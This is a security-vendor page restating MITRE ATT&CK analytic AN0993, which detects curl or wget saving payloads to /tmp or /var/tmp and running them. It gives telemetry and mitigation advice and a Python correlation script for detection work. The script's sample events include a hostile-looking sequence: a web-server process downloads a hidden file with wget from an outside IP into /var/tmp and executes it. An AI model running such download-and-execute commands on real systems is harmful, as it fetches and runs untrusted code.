MITRE ATT&CK® Analytic

AN0993: Analytic 0993

Detect curl/wget commands saving executable/script payloads to /tmp or /var/tmp followed by execution. Monitor packet captures or IDS/IPS alerts for injected responses or mismatched content types.

Enterprise | AN0993 | Analytic | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: High

This analytic is about a common Linux risk pattern: command-line download tools such as curl or wget placing a script or executable in temporary directories like /tmp or /var/tmp and then running it. For leaders, the value is not the tool name itself; curl and wget are legitimate. The business issue is whether the organization can distinguish normal administration and automation from suspicious temporary payload execution before it becomes an incident-response blind spot.

Executive priority

Prioritize this as a Linux server and workload visibility check. Temporary-directory execution after network retrieval can matter to business continuity because it may occur on systems that host applications, infrastructure services, or cloud workloads. Executives should ask whether SOC teams receive command, process, file, and network evidence from Linux assets; whether alert triage can separate approved automation from unusual payload execution; and whether controls restrict unnecessary execution from writable temporary paths where feasible.

Technical view

Validate coverage for Linux events showing curl or wget saving executable or script-like payloads to /tmp or /var/tmp, followed by execution of the downloaded file. The supplied ATT&CK description also points to network-side evidence: packet captures or IDS/IPS alerts for injected responses or mismatched content types. SOC teams should correlate process creation, command-line arguments, file creation or modification in temporary directories, execution events, and network/IDS observations. Because no tactic and no separate official detection logic are supplied, detection engineering should treat this as a behavior pattern requiring local baselining rather than a complete rule specification.

Likely telemetry

  • Linux process creation and command-line telemetry for curl, wget, shells, interpreters, and executed files
  • File creation, modification, permission, and execution events under /tmp and /var/tmp
  • Network connection logs associated with Linux hosts running curl or wget
  • Packet capture, proxy, or IDS/IPS evidence showing injected responses or mismatched content types
  • Asset and workload context to identify approved automation, deployment tooling, and administrative scripts

Detection direction

  • Tune for the sequence of download-to-temporary-directory followed by execution, rather than alerting on curl or wget alone.
  • Baseline legitimate Linux administration, package installation, CI/CD, configuration management, and application deployment activity that may use temporary directories.
  • Prioritize unusual parent processes, unexpected users, uncommon destinations, newly executable files, and rapid download-then-execute timing.
  • Where packet capture or IDS/IPS exists, review alerts for content-type mismatches or injected response indicators in context with host execution telemetry.
  • Document blind spots where Linux hosts lack command-line logging, file execution visibility, or network inspection.
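One way to implement the download-then-execute correlation described above, as an added example that is not MITRE's or Glexia's code: it walks constructed Linux process-creation events, pairs a curl/wget write into /tmp or /var/tmp with a later execution of the same path inside a time window, and suppresses matches from an assumed local allowlist of approved automation. The event fields, interpreter list, allowlist and sample events are all assumptions made for the example.

```python
import shlex

TEMP_DIRS = ("/tmp/", "/var/tmp/")
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}
WINDOW_SECONDS = 300  # max download-to-execute gap that is still correlated
# Hypothetical local allowlist of (user, parent) pairs for approved automation
ALLOWLIST = {("deploy", "/usr/bin/ansible-playbook")}

EVENTS = [  # constructed sample process-creation events: ts in seconds, cmd = full command line
    {"ts": 100, "user": "deploy", "parent": "/usr/bin/ansible-playbook",
     "cmd": "curl -sS https://repo.example.internal/agent.sh -o /tmp/agent.sh"},
    {"ts": 102, "user": "deploy", "parent": "/usr/bin/ansible-playbook",
     "cmd": "bash /tmp/agent.sh"},
    {"ts": 500, "user": "www-data", "parent": "/usr/sbin/apache2",
     "cmd": "wget -q http://203.0.113.10/x -O /var/tmp/.x"},
    {"ts": 503, "user": "www-data", "parent": "/usr/sbin/apache2", "cmd": "/var/tmp/.x"},
    {"ts": 900, "user": "alice", "parent": "/bin/bash",
     "cmd": "curl https://example.com/report.csv -o /tmp/report.csv"},
]

def download_target(argv):
    """Local path a curl/wget command line writes to (-o/--output, wget -O, or '>'), else None."""
    tool = argv[0].rsplit("/", 1)[-1]
    if tool not in ("curl", "wget"):
        return None
    for i, tok in enumerate(argv[1:-1], 1):        # the path must follow the flag
        if tok in ("-o", "--output", ">") or (tool == "wget" and tok == "-O"):
            return argv[i + 1]
    return None

def executes(argv, path):
    """True if the command runs `path` directly or hands it to a known interpreter."""
    return argv[0] == path or (argv[0].rsplit("/", 1)[-1] in INTERPRETERS and path in argv[1:])

def find_temp_download_exec(events, window=WINDOW_SECONDS, allowlist=ALLOWLIST):
    """Correlate temp-dir downloads with a later execution of the same file; return alert tuples."""
    pending, alerts = {}, []                        # pending: path -> download event
    for ev in sorted(events, key=lambda e: e["ts"]):
        argv = shlex.split(ev["cmd"])
        target = download_target(argv)
        if target and target.startswith(TEMP_DIRS):
            pending[target] = ev                    # remember the download, await execution
            continue
        for path, dl in list(pending.items()):
            if ev["ts"] - dl["ts"] > window:
                del pending[path]                   # too old to correlate, drop it
            elif executes(argv, path):
                del pending[path]
                if (ev["user"], ev["parent"]) not in allowlist:   # baseline exception
                    alerts.append((path, ev["user"], ev["parent"], ev["ts"] - dl["ts"]))
    return alerts
```

Each alert carries the temp path, the executing user and parent, and the download-to-execute delay, which are the fields the bullets above single out for triage; a real deployment would feed these from auditd, eBPF or EDR process telemetry instead of the inline sample.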

Mitigation priorities

  • Ensure critical Linux systems and workloads have reliable process, command-line, file, and network telemetry before relying on this analytic.
  • Reduce unnecessary execution from writable temporary directories where operationally feasible and test exceptions for business processes.
  • Apply least-privilege administration and restrict who can create, modify, and execute scripts on production Linux systems.
  • Use network and egress controls to limit unsanctioned download paths from sensitive Linux environments where appropriate.
  • Maintain allowlists or documented baselines for approved automation that legitimately downloads and executes temporary files.

Analyst notes and limits

The object is a detection analytic for Linux only. It has no supplied tactic, no relationships, and no separate official detection field beyond the description. Treat the analytic as a validation prompt for telemetry and correlation rather than a complete production detection rule.

This take is limited to the supplied ATT&CK fields and external reference. It does not establish attacker attribution, active exploitation, impact, or guaranteed detection. Local environment baselines are required to determine severity and false-positive rates.

Official MITRE ATT&CK definition

Analytic 0993

Detect curl/wget commands saving executable/script payloads to /tmp or /var/tmp followed by execution. Monitor packet captures or IDS/IPS alerts for injected responses or mismatched content types.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: e33e3d275c4bbe78...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 1.0 | | Current bundle | e33e3d275c4b…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack AN0993

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.